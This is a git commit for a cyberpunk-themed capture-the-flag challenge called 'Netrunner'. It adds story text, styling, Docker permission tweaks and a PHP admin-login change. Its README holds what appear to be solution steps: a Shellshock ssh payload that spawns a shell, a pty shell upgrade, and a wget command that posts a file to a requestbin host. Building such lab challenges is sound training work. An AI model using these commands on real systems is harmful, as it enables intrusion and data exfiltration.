Prod version CTF

2019-01-29 22:21:05 +01:00 · 2019-01-29 22:21:05 +01:00 · 7828640ed9
commit 7828640ed9
parent 71d5ff415e
4 changed files with 71 additions and 4 deletions
--- a/README.md
+++ b/README.md
@ -1 +1,63 @@
 # Netrunner
+
+chmod 777 mariadb
+
+
+###
+
+ssh puppet-master@10.2.0.1 -p 2222 -i ~/.ssh/maintenance '() { :;}; /bin/sh -i'
+
+python3 -c 'import pty; pty.spawn("/bin/sh")'
+
+sudo -g zetatech-maintenance  wget --post-file=tech.note https://requestbin.fullcontact.com/XXXX
+
+
+hint Netrunner 2/3: He seems to have a "ghost" in the shell
+
+
+
+<style type="text/css">
+@font-face {
+  font-family: 'Share Tech Mono';
+  font-style: normal;
+  font-weight: 400;
+  src: local('Share Tech Mono'), local('ShareTechMono-Regular'), url(../fonts/techmono.woff2) format('woff2');
+  unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
+}
+.netrunner {
+  color: #db0e15;
+  font-family: 'Share Tech Mono', monospace;
+  font-size: 16px;
+  font-weight: 300;
+  text-shadow: 0 0 5px rgba(219, 14, 21, .8);
+  background: url(https://image.ibb.co/h2hLAJ/bg.png);
+  padding: 20px;
+}
+
+.netrunner-bold {
+  font-weight: 700;
+}
+
+.netrunner-orange {
+  color: #c99c31;
+  text-shadow: 0 0 5px #c99c31b3;
+}
+</style>
+
+<p class="netrunner" ><span class="netrunner-bold">V, I got a mission for you!</span> <br> <br>
+We discoved a Netrunner who hack neural implants to create false memories. We spotted the target's interface on the Net at this address: <br>
+<span class="netrunner-orange">http://149.202.58.152:8080</span> <br> <br>
+Find out who he is and a way to stop him.</p>
+
+
+
+<p class="netrunner" ><span class="netrunner-bold">Nice V! I owe you one!</span> <br> <br>
+But before we go to visit him, I would like to have a means of pressure.
+Here is his maintenance access: <br>
+<span class="netrunner-orange">http://149.202.58.152:2222</span> <br> <br>
+See what you can do and let me know.</p>
+
+
+<p class="netrunner" ><span class="netrunner-bold">You doing great!</span> <br> <br>
+But this access is not enough. See if you can get privileged access, the same used by Zetatech technician for maintenance.<br><br>
+It will allow us to unplug it in case of a glitch.</p>
--- a/debian-ssh/Dockerfile
+++ b/debian-ssh/Dockerfile
@ -56,9 +56,9 @@ COPY ./banner /etc/banner

 # Configure permissions
 RUN chmod -R 550 /home/${user} \
-    && chown -R ${user}:${user} /home/${user}/.ssh \
-    && chmod 500 /home/${user}/.ssh \
-    && chmod 400 /home/${user}/.ssh/authorized_keys \
+    && chown -R root:${user} /home/${user} \
+    && chmod 750 /home/${user}/.ssh \
+    && chmod 440 /home/${user}/.ssh/authorized_keys \
    && chmod 773 /tmp \
    && chmod +t /tmp

--- a/docker-compose.yml
+++ b/docker-compose.yml
@ -1,4 +1,4 @@
-version: '3'
+version: '2.2'

 services:
    web:
@ -39,3 +39,4 @@ services:
        ports:
            - "2222:22"
        restart: always
+        cpus: '.3'
--- a/webroot/zetatech-admin.php
+++ b/webroot/zetatech-admin.php
@ -47,10 +47,14 @@ if (isset($_POST['login']) && $_POST['login'] == 'Login') {
        </div>";
        $state->string = $html_login;

+      } elseif ( $num_row == 1 && $row['user'] === 'admin') {
+        $state->return = 'false';
+        $state->string = 'admin is desactivated. Use your login.';
      } else {
        $state->return = 'false';
        $state->string = 'Access Denied';
      }
+
    } else {
      $state->return = 'password';
      $state->string = 'Password Missing';